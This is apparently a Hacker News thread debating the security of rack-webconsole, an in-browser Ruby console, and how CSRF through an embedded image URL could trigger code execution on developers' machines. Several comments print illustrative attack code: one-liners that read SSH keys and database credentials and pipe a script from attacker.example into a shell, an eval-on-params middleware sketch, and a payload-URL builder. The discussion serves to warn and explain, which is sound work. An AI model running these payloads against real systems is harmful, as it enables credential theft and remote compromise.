Rack-webconsole: a Ruby/Rails console inside your browser (codegram.com)
104 points by rohitarondekar 2372 days ago | 55 comments



On the CSRF concern, which is totally valid, I've pushed a patch. From version 0.0.5 it uses a token to prevent this kind of attack.

https://github.com/codegram/rack-webconsole/commit/d5060d0e8...
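
The commit is short; the idea is roughly the following sketch. This is illustrative only (the path, parameter, and class names here are made up), not the actual diff:

    require 'rack'
    require 'securerandom'

    # Sketch only: assumes a session middleware (e.g. Rack::Session::Cookie)
    # sits above this in the stack. A random token is stashed in the session,
    # and nothing is evaluated unless the AJAX request echoes it back.
    class TokenCheckedConsole
      def initialize(app)
        @app = app
      end

      def call(env)
        request = Rack::Request.new(env)
        if request.path == '/webconsole'
          token = (request.session['webconsole_token'] ||= SecureRandom.hex(16))
          unless request.params['token'] == token
            return [403, { 'Content-Type' => 'text/plain' }, ['Bad console token']]
          end
          # ...only now hand the submitted code to the evaluator...
        end
        @app.call(env)
      end
    end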


This is a very bad idea.


As patio11 already noted, this is a bad idea. Furthermore, I don't see what it solves. Can't you just SSH into the box and keep that window open? Isn't this a window-manager problem rather than a Rack/infrastructure problem?


It is meant for development environments only. Nobody would risk putting a Ruby console in production :)

In fact, when used with Rails, it is loaded only in the development environment. With other frameworks, you should take care of which middlewares you use in each environment.
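
With Rails that just means keeping it in the development group of your Gemfile, something like this (typical Bundler usage, sketched rather than copied from the README):

    # Gemfile: load the console middleware only in development
    group :development do
      gem 'rack-webconsole'
    end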


I would think long and hard about whether giving code-execution privileges on your local machine to anyone who can convince you to click on a link is a good idea. Actually, this should be neither long nor hard.

Edit to add: You don't even need to click on the link, you just need to view an image whose src I can manipulate. Ugh. Seriously: do not install on any environment anywhere.


Can you expand on this? What's the risk? What's the attack vector?


Cross-site request forgery.

I should add though that even if this thing gets an XSRF token and it's secure, you might as well take the passwords off your SSH keys if you're running this, because you're coughing up an unprotected remote shell to anyone who can talk to a dev server once you turn this on.


I think he's saying that someone can make you open a web page that includes an image with the proper src attribute and bang, your Rails site is broken.


More likely, your whole data center.


Hyperbolic.


I know you've been a dev/ops guy for 20 years and I respect the fact that your development machines are sealed in vaults, but I've gotten to assess more than half of the top 10 biggest Rails apps in the world over the past couple of years and trust me, you're just wrong about this. Development machines are within reach of developer browsers. Database machines are within reach of development machines.


You've probably figured this out by now, but I'm pretty sure you're missing the point. From your other comments in this thread you appear to think that the machine needs to be internet-accessible: have a public IP, an open firewall, all that.

The reason this is so dangerous is that it needs none of that. All it needs is for your development machine to have access to the internet.

I open up a project, enable this, and run rackup locally.

I then view your Twitter stream, where you've embedded a crafted link behind a URL shortener.

Because my browser fetches that link, you've now remotely executed code on my machine. Assuming I'm anything like most Rails shops, you can probably get to a number of other machines through mine.


> What's the attack vector?

CSRF.


You're right, that's a risk. I've opened an issue to implement a simple pseudorandom token to protect AJAX requests. What do you think? https://github.com/codegram/rack-webconsole/issues/4


I think you can achieve the same thing using shellinabox. Take a look at http://blog.servermonitoringhq.com/posts/the_ultimate_web_ba...


Right! A dev server is for dev; even to show off the app to your friends you've got to remove this console. So IMHO you don't have to worry about security if it's your tiny dev machine sitting on your desk, unless you are paranoid about securing your iron cage.

If anyone has used the Seaside framework, can you shed some light on how this compares to the in-page editing that Seaside provides (from what I've heard)?


A dev server is for dev; even to show off the app to your friends you've got to remove this console. So IMHO you don't have to worry about security if it's your tiny dev machine sitting on your desk

One of your friends is named Firefox, and he does not take orders from you, he takes orders from me.


So people now downvote if they don't agree with you? sw33t. I would love to know a reason.


Patrick, I love everything you post, normally. In this case, you've misunderstood. This is a development and test tool. If someone puts this into the production environment, he deserves what he gets. For development, this is invaluable and awesome.


Sabat, would you do the following for me?

Turn on Rails.

Open Firefox, type http://localhost:3000/a-malicious-string into the top bar. Hit enter.

Observe how that delivers a malicious string to your web server. This particular string will 404. I can construct much more interesting strings.

Now, notice that step where I told you a URL to type in? Pretend that, instead, I had control over some element of a webpage you were looking at. Any element would do. Say you come to a blog where I control an image embed for my avatar, and I embed <img src="http://localhost:3000/a-malicious-string" />. Firefox is going to make the HTTP request I desire without you having to do anything suspicious and without me ever having to talk to localhost:3000 directly.

After I have a malicious string in your web server, this application lets me execute arbitrary code as your web server. Things get very, very interesting then, in the "may you live in interesting times" sense of interesting. For example, one interesting thing I could do is read your SSH private key, which you use to connect from development to staging or production. Another thing I could do is read your database credentials from database.yml, and maybe even just open up extra ActiveRecord connections directly to those databases and start executing arbitrary SQL. Still another thing I could do is install a keylogger or rootkit on your local machine and wait to get whatever credential I need to totally compromise your company. There are many, many options.
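
To make that concrete, here is the flavor of Ruby an attacker could submit once arbitrary eval is on the table. These are hypothetical one-liners running inside your Rails process, not anything specific to this gem:

    File.read(File.expand_path('~/.ssh/id_rsa'))                   # lift the SSH private key
    YAML.load_file('config/database.yml')                          # grab the database credentials
    ActiveRecord::Base.connection.execute('SELECT * FROM users')   # arbitrary SQL against your app's DB
    system('curl http://attacker.example/payload | sh')            # stage a keylogger or rootkit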

Do not install this anywhere.


Hmm. What would you say about the Werkzeug debugger? It's been around a while but also allows in-browser console debugging.

http://werkzeug.pocoo.org/docs/debug/


I'd be interested in this as well (as someone preparing to start a flask project)...


Ah Flask is pretty incredible. You could probably learn it and build a functional MVP by the time we get a decent answer. (And no, I'm not hinting that it'll take a long time for him to answer :)

You can turn off the console debugger though if it's making you uneasy by doing this:

    app.run('localhost', debug=True, use_evalex=False)
You'll still get the nice stack trace and code context, but without the ability to run arbitrary code.


Help me understand this. In your example, how would this malicious string be any more worrisome with the console installed than without it? I realize you could trigger the console to be displayed by crafting a URL, but it would be displayed in my browser (and thus on localhost) as the consumer of your URL, correct? It'd be one thing if this gem caused any arbitrary query string to be executed as Ruby code, but I don't believe it does. So help me understand how you could exploit this.

I'm not doubting you... I'd simply like to understand. Thanks.


It'd be one thing if this gem caused any arbitrary query string to be executed as Ruby code

That's pretty much the exact designed intent of the software. Read the Repl code, specifically, Repl#call at line 59 or so.

https://github.com/codegram/rack-webconsole/blob/master/lib/...
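
If you don't want to read the source, the pattern boils down to roughly this (a paraphrase of the idea, not the gem's actual code, and the parameter name is a guess):

    require 'rack'
    require 'json'

    # The essence of a web console middleware: whatever shows up in the
    # params is handed straight to eval inside the running app process.
    class NaiveConsole
      def initialize(app)
        @app = app
      end

      def call(env)
        request = Rack::Request.new(env)
        if (code = request.params['query'])
          result = eval(code)  # arbitrary code execution, by design
          return [200, { 'Content-Type' => 'application/json' },
                  [{ result: result.inspect }.to_json]]
        end
        @app.call(env)
      end
    end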

You'll note the code has recently been enhanced with check_legitimate, which was designed to patch the issue I raised in this thread (and via email). I am going to very carefully avoid commenting on whether check_legitimate actually works as designed. My main worry is that pronouncing it sound would make me professionally responsible when it gets cracked, and committing to endless rounds of "actually, that won't really work" throws good hours after bad in pursuit of securing a bad idea that is architecturally insecurable.

Do not allow your web application to execute arbitrary code. It will not end well.


Isn't this in the same vein as Ajaxterm/Anyterm? I suppose most uses of those (e.g. Slicehost/Linode) are behind SSL.


What difference are you supposing that would make?


I have preconceived ideas, but I am not a security specialist by profession, hence the question. Perhaps you could explain instead of downvoting?


Since the request is coming from an authorized user, then SSL won't matter any which way. The action the attacker is causing the user to take would be legitimate except the user doesn't actually want to do it. Check out CSRF.


Thanks, Mentat. Yup, I understand CSRF and current mitigations such as tokenization, double-submit cookies, etc. I was trying to get an explanation from tptacek or patio11 about their statements about unprotected shells and arbitrary code.

The most-upvoted comment is from patio11, about it being a very bad idea. A lot of discussion and hand-waving happened before CSRF was even mentioned. Once the author implemented a CSRF fix, the conversation seemed to quiet down. So is this kind of web-based access on the road to being safe and usable now?

Many popular VPS hosts offer out-of-band access through web-based consoles such as Anyterm and Ajaxterm. Are those acceptable simply because they've taken care of the common CSRF and XSS issues? They allow arbitrary code on the remote boxes, so how are they different from a security standpoint? I have no idea, so I just threw out SSL even though it probably makes no difference; I simply don't have the background or experience to know. Is it time to be concerned about how proficient the hosts are at securing their hypervisors and bridged networking for guests? If they do pose a concern, why is there not more brouhaha to get some attention on the matter? Linode and Slicehost have a lot of customers...

Just saying it's a bad idea and moving on, without mentioning other implementations, leaves a bad taste. Someone also asked about Werkzeug (of the Python demesne)...


The idea is that any sort of web console (that can be attacked with CSRF) is a really bad idea, as it likely results in a complete compromise. Most web developers are not at all good at web security (case in point: this release, with easy CSRF vulnerabilities). The likelihood that the same or similar mistakes will be introduced again later is high. The conservative approach is that, because the consequences of a failure are really bad and the level of convenience beyond an SSH shell is marginal, you should never use web consoles. I guess if you were an expert at web security you could analyze a particular web console and say "yeah, it looks OK to me and I'm willing to take the risk." I think Patrick is saying that he doesn't see that as a worthwhile tradeoff for himself (as an expert), and therefore it seems particularly unwise for non-experts to be doing it.

There is some buzz about doing cloud to cloud attacks but I haven't heard anything that's been realized yet. I have also heard that there are issues with data staying resident on local disks on EC2 after machine termination, but I don't know if that's the case.


Again: this is fixed in version 0.0.5, thanks precisely to your warning.


He understands that. Like me (we've trained him well!), he does not have particularly great faith in the insulating powers of the words "development environment".

At a minimum, after running this you are one Twitter shortened link away from losing your development machine. The link will probably show you a cute cat picture just like any other one. You'll only find out you lost the machine later.

At worst, you're one of the 80% of companies that keeps development machines in your data center protected by a firewall/VPN. Now you're a cute cat picture away from attackers with direct TCP access to your database servers. Wee!


I've read through the rest of this thread, and I'm still not understanding the big deal about this tool.

If the entire dev environment is my MacBook, the app is localhost:3000, the line to enable this thing exists only in the development-environment initializer, and I leave it commented out except for those rare cases where I want to inspect session variables, controller state, or some other thing that can't really be done in irb, then what's the risk?

At least, that's how I would use it...

EDIT: Never mind, patio11 explained it much better in his response above. I still think this could be a useful tool with CSRF protection.


There used to be web-based Rails debuggers, weren't there? I haven't used any kind of Ruby debugger since 2007. I just keep an SSH screen with "bundle exec rails console" running. I'm under the impression that this is what most people do.

So what's the win here?

Even with CSRF protection, you still have to worry about who can talk to port 3000 on your machine. There's a "rails server" running on my Macbook pretty much every day. I bought a whole separate Macbook because I was worried about the attack surface that Rails runs with by default. Adding a remote shell to the mix doesn't seem like a win.


> There used to be web-based Rails debuggers, didn't there?

I'm not sure... this is the first one I've ever heard of. Remote debugging has been around for years on plenty of platforms, but this is the first remote debugging tool for Ruby that I have seen, and embedding it into Rack is kind of cool and useful. And sure, it's probably not very secure in version 0.0.5.

That doesn't mean "all remote debugging is bad and insecure, and you're stupid for even considering this," which sadly is the tone people are taking. I can think of several ways this thing could be made more secure. The gem initializer could take a private key, and the backtick command could prompt you to enter the public key, rather than just dropping you straight into a console and executing arbitrary code.

> So what's the win here?

Yes, normally I would just SSH to the remote machine and run "bundle exec rails console" too. Or, far more likely, there is no remote machine and I just open another terminal window and keep a console running. (Sorry I said "irb" when I meant "rails console"; in my mind they're basically the same thing.)

The win (at least, to me) is that I can inspect parts of the rails stack that change as the user (me) is interacting with the app, such as request details, session contents, controller variables.

>I just keep an SSH screen with "bundle exec rails console" running. I'm of the impression that this is what most people do.

>I bought a whole separate Macbook because I was worried about the attack surface that Rails runs with by default.

This seems a bit incongruous, don't you think? I'm not trying to pick a fight, but I read stuff like this and I just feel sad...


after running this you are one Twitter shortened link away from losing your development machine

Who runs an internet-accessible development machine? Maybe I give the rest of the dev world too much credit.

you're one of the 80% of companies that keeps development machines in your data center protected by a firewall/VPN

I've been in dev/ops for about 20 years and have been working on the internet since the web took off in '94. I have never, ever heard of such a thing, and would freak out if I did. 80% of companies? Maybe you've got stats to back this up and my experience is merely anecdotal, but I've never heard of a single instance of something so obviously stupid. SQL injection vulnerability, sure. XSRF or XSS vulnerability, sure. Running a database server on the same host as your app server, with the web server running as the DBA user? Sure, it happens.

Certainly someone is bound to misuse this gem as well. But that doesn't mean it's "a very bad idea". It's a very good idea. It's just that it takes knowledge and experience to run a web site, and some people have to find out the hard way.


Everybody runs development machines that can (a) be spoken to by machines with human-driven browsers and (b) can speak to other machines.

You're a dev/ops guy; I'm an appsec assessor. I think we just look for different things. Trust me, this isn't just common, it's standard practice.

It's a clever bad idea. Minimal payoff. Maximum risk.

Incidentally: I'm not sure I'm in love with this "everyone has to find out the hard way" notion. No, they don't. We can just tell them: DON'T RUN STUFF LIKE THIS, IT WILL HURT YOU. You have 20+ years of experience. Most people on HN do not; they see this, think "ooo, shiny", and install it. As a practitioner yourself, you have a responsibility --- in fact, if you're keeping that CISSP cert current, an obligation --- to step in and help that not happen.

By the way: hey, you asked.


Who runs an internet-accessible development machine? Maybe I give the rest of the dev world too much credit.

I apologize for not having an underground Cold War bunker in which to develop my software. Until I get one, I'll stick with my one and only machine (which, as you can tell, has internet access) for doing development.

EDIT: And because of that, I'd never put this code on a machine I run.


Most professional shops do indeed have dev machines. They live at Rackspace alongside the prod servers. They are protected from the Internet by firewall rules; you need a VPN connection to access them. Unfortunately, everyone who writes code has that VPN connection accessible at all times, because that's their job, and so rack-webconsole puts them a cute cat picture away from giving an anonymous Twitter user access to their data center.


It doesn't need to be internet-accessible; that's the point. As long as I can guess the URL your development machine uses and get you to click a link on your laptop, I can make this work (in the bad sense of the word).


Who runs an internet-accessible development machine? Maybe I give the rest of the dev world too much credit.

I am reminded of Sony's plain text captcha. There are stupid people out there.


You're a dev/ops guy; I'm an appsec assessor. I think we just look for different things. Trust me, this isn't just common, it's standard practice.

Actually I'm a CISSP and was CISO for a major financial web site for >5 years. I look at things the way you do, trust me.

It's just that I try to temper my security reflexes. Just because something is potentially dangerous doesn't mean it's automatically a bad idea.

Everybody runs development machines that can (a) be spoken to by machines with human-driven browsers and (b) can speak to other machines.

Indeed we do. And if you can't trust that environment to be private and secure, then you've got bigger problems than a web console. I wouldn't stop at shutting down SSH; I'd disconnect entirely. Hell, I'd quit.

If your dev environment is exposed to people who are malicious, you're screwed. Web console is not going to hurt you, because it's too late -- you've already been hacked.


I think you're missing the part about how your dev machine doesn't have to be exposed to malicious people here.

My condolences on having to get the CISSP. ;)


I think you're contemplating the attack vectors from the wrong direction. We're not necessarily talking machines with open ports on internet facing IP addresses. Think about it from the other direction.

The root of the problem comes down to a few factors:

A) HTTP is a relatively "trusted" protocol, which means you should be very, very careful about running local services over HTTP (on any port) that can do bad things™ to your computer.

B) http://localhost:3000/ isn't difficult to guess. If you know someone is a Rails developer, there is a good chance that embedding requests to that URL will hit a Rails dev environment at some point, and that's where this thing is going to end up running.

C) Eval, in general, is just about the right length of rope to hang yourself with. Use sparingly and with great respect for its ability to completely hose you. Passing anything sent as HTTP params to eval is just asking for it.

Knowing the above, consider an example like Patrick (patio11) outlines above.

Let's say this takes off and people start using it. That means some percentage of Rails devs have this running. To attack their machines, I need only trick their machine into making a request to http://localhost:3000/malicious-string-here.

How might I accomplish that? I like Patrick's suggestion of an img tag src attribute. There are plenty of forums that treat img tags as safe, or provide some means of embedding images with arbitrary src attributes.
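
Crafting that request is trivial; here's a rough sketch of building such a URL (the parameter name and payload are hypothetical):

    require 'erb'

    payload = "File.read(File.expand_path('~/.ssh/id_rsa'))"   # any Ruby at all
    url = "http://localhost:3000/?query=#{ERB::Util.url_encode(payload)}"
    # Drop that URL into an <img src="..."> somewhere the victim will browse,
    # and their own browser makes the request for you.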

So let's say I head over to railsnewbforum.com and embed the malicious image in my sig. Then I start happily posting useful information in every thread on the board. Assuming this webconsole takes off, how long until a vulnerable dev hits a page with my malicious signature code and gets pwnd?

Can this be made safe? Probably to some degree, but then it would require many of the same security measures you already get by running the Rails console over an SSH session or something similar.

IMO, it's not worth the risk.


Nice way to introduce Rack. Much better than the usual hello world.

I wouldn't use it for obvious reasons, but I like the demo.


Cool! Firebug for the frontend, rack-webconsole for the backend.


Reading the headline, I was hoping this was a ruby-debug console in the localhost browser for the current request. Perhaps that can be shoehorned into rack-webconsole?


You'd probably be interested in https://github.com/ryanb/enlighten


I think this is a pretty cool tool, for both development/staging and also for production in a very restricted way. Every site has some kind of admin panel. I see this like a phpMyAdmin on asteroids for rack apps.

Definitely interesting.


I see this like a phpMyAdmin on asteroids for rack apps.

Dear christ, please do not ever put this near production.


phpMyAdmin on asteroids sounds about right. http://en.wikipedia.org/wiki/Cretaceous%E2%80%93Tertiary_ext...


Except for extreme circumstances (emergency debugging) I wouldn't let this thing near production. For development, it's super-handy, though.


It's sweet to see browsers opening up to development within themselves. We can surely do this securely with some amount of effort. I'd love to see a world without the need for Eclipse/Aptana.


This seems like a boon for anyone trying to develop and debug issues on Heroku.



